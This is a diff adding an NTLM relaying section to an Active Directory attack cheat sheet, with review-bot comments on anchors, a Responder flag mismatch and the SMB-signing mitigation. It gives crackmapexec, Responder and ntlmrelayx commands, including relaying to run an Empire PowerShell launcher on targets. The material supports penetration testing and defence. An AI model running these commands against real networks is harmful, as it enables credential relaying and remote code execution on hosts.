@@ -15,7 +15,7 @@ tags: [windows, security, network, AD]
* [More Advanced Attacks](#more-advanced-attacks)
* [Kerberoasting](#kerberoasting)
* [AS-REP Roast](#as-rep-roast)
- * [NTLM relaying attack](ntlm-relaying-attack)
+ * [NTLM relaying attack](#ntlm-relaying-attack)
## Low Hanging Fruits
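Review bot: the corrected entry now matches the other TOC links in the hunk, which all use an in-page `#` anchor; the old `(ntlm-relaying-attack)` would have been resolved as a relative path rather than a heading link. The slug `ntlm-relaying-attack` corresponds to the `### NTLM relaying attack` heading added in the second hunk, so the link only resolves when both hunks land together; keeping them in one commit, as done here, is right.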
@@ -273,4 +273,31 @@ PS> Get-DomainUser -PreauthNotRequired
### NTLM relaying attack
+* Creating a list of potential targets with `crackmapexec`
+
+```
+sh> cme smb computers.txt --gen-relay-list targets.txt
+```
+
+* Start responder (with the HTTP & SMB server turned off):
+
+```
+sh> python Responder.py -I <interface> -r -d -w
+```
+
+* Start the NTLM relaying with `ntlmrelayx.py` using the targets from above:
+
+```
+sh> ntlmrelayx.py -tf targets.txt
+```
+
+* This can also be used to execute an custom executable (e.g. empire launcher):
+
+```
+sh> ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>
+```
+
+#### References:
+
+* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
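Review bot: the step text and the command disagree on the Responder line: `Start responder (with the HTTP & SMB server turned off)` promises a state that none of the shown flags (`-I <interface> -r -d -w`) produces, so a reader who copies the command as written does not get what the bullet describes; either document where that setting is made or drop the parenthetical. Two smaller points in the same hunk: `-c` in the last `ntlmrelayx.py` example takes a command string (the placeholder itself says "PowerShell launcher"), so `execute an custom executable (e.g. empire launcher)` should read `run a custom command (e.g. an Empire PowerShell launcher)`; and the four fenced blocks carry no language tag, unlike a Markdown fence that would render with highlighting. From the defensive side, the first bullet should say what `--gen-relay-list` filters on (hosts where SMB signing is not required), so the reader sees why those hosts are candidates and that enforcing SMB signing removes them from the list.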